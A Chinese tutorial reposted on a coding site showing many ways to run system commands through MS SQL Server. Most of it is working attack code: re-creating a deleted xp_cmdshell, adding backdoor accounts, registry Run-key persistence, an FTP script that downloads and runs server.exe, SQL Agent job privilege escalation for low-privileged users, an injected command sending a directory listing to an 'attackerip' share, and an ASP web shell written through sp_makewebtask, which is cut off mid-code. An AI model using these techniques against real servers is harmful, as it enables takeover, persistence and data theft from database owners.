• 欢迎访问搞代码网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站!
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏搞代码吧

如何在MSSQL执行命令_sqlserver

sqlserver 搞代码 3年前 (2018-06-17) 129次浏览 已收录 0个评论

1).XP_CMDSHELL ‘cmd.exe /c net user aaa bbb /add’

人人都知道的办法,最大的好处是有回显,但是最怕

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]’) and OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]’

通过上面的T-SQL语句就可以把这个扩展储存删了

我们一般可以用

2k:

EXEC sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’

SQL97:

EXEC sp_addextendedproc xp_cmdshell ,@dllname =’xpsql70.dll’

就还原了.

但是有的人知道sp_addextendedproc也只不过是一个储存过程一样可以删除的

Drop PROCEDURE sp_addextendedproc

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]’) and

OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]’

还原:

create procedure sp_addextendedproc — 1996/08/30 20:13

@functname nvarchar(517),/* (owner.)name of function to call */

@dllname varchar(255)/* name of DLL containing function */

as

set implicit_transactions off

if @@trancount > 0

begin

raiserror(15002,-1,-1,’sp_addextendedproc’)

return (1)

end

/*

** Create the extended procedure mapping.

*/

dbcc addextendedproc( @functname, @dllname)

return (0) — sp_addextendedproc

呀呀写了这么多其实有个最简单的保护办法:

先NET stop mssqlserver,然后把xplog70.dll(SQL97下用xpsql70.dll)删了

再把服务打开就可以了

2)看了上面的你就明白了xp_cmdshell最终是可以被删除的没别的办法了吗?

有写注册表三:

xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/currentversion/run’, ‘czy82′,’REG_SZ’, net user czy bb /add

其实注册表还有好几个地方可以写的比如说注册表中的web浏览设置

用写注册表的办法不好的地方是不但没有回显而且不能马上运行实不实用我也不知道了

3)

declare @s int

exec sp_oacreate "wscript.shell",@s out

–exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open ASP.7i24.com>c:/a.txt"

–exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:/a.txt"

–exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:/a.txt"

–exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo get server.exe>>c:/a.txt"

–exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo close>>c:/a.txt"

–exec sp_oamethod @s,"run",NULL,"cmd.exe /c ftp -s:c:/a.txt"

exec sp_oamethod @s,"run",NULL,"cmd.exe /c server"

对了正如你看到的我们还可以使用sp_oacreate和sp_oamethod在它们的作用下我们可以

调用系统的控件比如说fso,wsh,shell什么的,但是有个问题是并不能象xp_cmdshell那样

马上看到结果真的不能吗看下面的:

declare @s int,@o int ,@f int,@str nvarchar(4000)

/*exec sp_oacreate "wscript.shell",@s out

exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user>c:/temp.txt"*/

exec sp_oacreate "scripting.filesystemobject", @o out

exec sp_oamethod @o, "opentextfile", @f out,"c:/temp.txt", 1

exec sp_oamethod @f, "readall",@str out

print @str

先执行注解内的然后执行外面的其实原理很简单就是利用>把结果写到一个文件中然后用

fso来读出来!很实用的

4)

use msdb; –这儿不要是master哟

exec sp_add_job @job_name=’czy82′;

exec sp_add_jobstep @job_name=’czy82′,@step_name = ‘Exec my sql’,@subsystem=’CMDEXEC’,@command=’dir c:/>c:/b.txt’;

exec sp_add_jobserver @job_name = ‘czy82’,@server_name = ‘smscomputer’;

exec sp_start_job @job_name=’czy82′;

利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql后面的我们就可以

执行tsql语句了.

[email protected]_name我们要指定你的sql的服务器名

第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)

net start SQLSERVERAGENT

对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的

USE msdb

EXEC sp_add_job @job_name = ‘GetSystemOnSQL’,

@enabled = 1,

@description = ‘This will give a low privileged user access to

xp_cmdshell’,

@delete_level = 1

EXEC sp_add_jobstep @job_name = ‘GetSystemOnSQL’,

@step_name = ‘Exec my sql’,

@subsystem = ‘TSQL’,

@command = ‘exec master..xp_execresultset N”select ””exec

master..xp_cmdshell "dir > c:/agent-job-results.txt"”””,N”Master”’

EXEC sp_add_jobserver @job_name = ‘GetSystemOnSQL’,

@server_name = ‘你的SQL的服务器名’

EXEC sp_start_job @job_name = ‘GetSystemOnSQL’

不要怀疑上面的代码我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以

才让我们可以以public执行xp_cmdshell

5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)

在安焦有文章:http://www.xfocus.NET/vuln/vul_view.php?vul_id=2968

USE msdb

EXEC sp_add_job @job_name = ‘ArbitraryFileCreate’,

@enabled = 1,

@description = ‘This will create a file called c:/sqlafc123.txt’,

@delete_level = 1

EXEC sp_add_jobstep @job_name = ‘ArbitraryFileCreate’,

@step_name = ‘SQLA

FC’,

@subsystem = ‘TSQL’,

@command = ‘select ”hello, this file was created by the SQL Agent.”’,

@output_file_name = ‘c:/sqlafc123.txt’

EXEC sp_add_jobserver @job_name = ‘ArbitraryFileCreate’,

@server_name = ‘SERVER_NAME’

EXEC sp_start_job @job_name = ‘ArbitraryFileCreate’

如果subsystem选的是:tsql在生成的文件的头部有如下内容

??ArbitraryFileCreate? ? 1 ?,SQLAFC? ???? 2003-02-07 18:24:19

———————————————-

hello, this file was created by the SQL Agent.

(1 ?????)

所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员

命令的vbs文件到启动目录!

6)关于sp_makewebtask(可以写任意内容任意文件名的文件)

关于sp_MScopyscriptfile 看下面的例子

declare @command varchar(100)

declare @scripfile varchar(200)

set concat_null_yields_null off

select @command=’dir c:/ > "//attackerip/share/dir.txt"’

select @scripfile=’c:/autoexec.bat > nul" ‘ + @command + ‘ rd "’

exec sp_MScopyscriptfile @scripfile ,”

这两个东东都还在测试试哟

让MSSQL的public用户得到一个本机的web shell:)

sp_makewebtask @outputfile=’d:/sms/a.ASP’,@charset=gb2312,

–@query=’select ””’

–@query=’select ”” ‘

@query=’select ”

Set oscript = Server.CreateObject("wscript.SHELL")

Set oscriptNet = Server.CreateObject("wscript.NETWORK")

Set oFileSys = Server.CreateObject("scripting.FileSystemObject")

szCMD = Request.Form(".CMD")

If (szCMD <>"")Then

szTempFile = "C:/" & oFileSys.GetTempName()

Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)

欢迎大家阅读《如何在MSSQL执行命令_sqlserver,跪求各位点评,若觉得好的话请收藏本文,by 搞代码


喜欢 (0)
[搞代码]
分享 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址